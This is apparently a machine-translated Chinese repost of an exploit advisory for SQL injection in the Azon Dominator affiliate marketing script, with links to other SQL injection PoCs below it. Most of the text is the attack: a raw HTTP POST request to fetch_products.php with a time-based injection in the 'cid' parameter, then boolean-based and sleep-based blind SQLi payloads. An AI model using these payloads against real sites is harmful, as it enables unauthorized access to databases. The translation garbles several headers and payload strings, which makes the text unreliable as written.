Azon Dominator会员营销脚本-SQL注入

HackApt-37 Team · 04 9, 2025

＃利用标题: Azon Dominator-会员营销脚本- SQL注入
＃日期: 2024-06-03
＃利用作者:buğraenisdönmez
＃vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
＃DEMO SITE: https://azon-dominator.webister.net/
＃测试在: Arch Linux
＃CVE: N/A。
＃＃＃要求＃＃＃
post /fetch_products.php http /1.1
content-type:应用程序/x-www-form-urlenceded
ACCEPT: /
X-重新要求- WITH: XMLHTTPREQUEST
Referer: https://localhost/
cookie: phpsessid=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8
内容长度: 79
Accept-incoding: Gzip，Deflate，br
用户- 代理: Mozilla/5.0（Windows NT 10.0; Win64; X64）AppleWebkit/537.36（Khtml，像Gecko一样）Chrome/119.0.0.0.0.0.0 Safari/537.36
HOST: LOCALHOST
Connection:保持空白
cid=1*if（现在（）=sysdate（）％2csleep（6）％2C0）max_price=124minimum_range=0sort=112
###
###参数有效载荷###
参数: CID（POST）
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload: cid=1）和7735=7735和（5267=5267
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人（查询睡眠）
payload: cid=1）和（从（select（sleep（5））yoxs选择7626）和（8442=8442
###

	POC Joomla 3.7.0 SQL注入(CVE-2017-8917) Shacker 09 13, 2024 POC/?Day
	兰陵OA EKP 后台SQL注入漏洞 CNVD-2021-01363 Shacker 09 10, 2024 POC/?Day
H	SCRMS 2023-05-27 1.0-多个SQL注入 HackApt-37 Team 04 9, 2025 POC/?Day
H	MotoCMS版本3.4.3 -SQL注入 HackApt-37 Team 04 9, 2025 POC/?Day
H	Groomify V1.0 -SQL注入 HackApt-37 Team 04 9, 2025 POC/?Day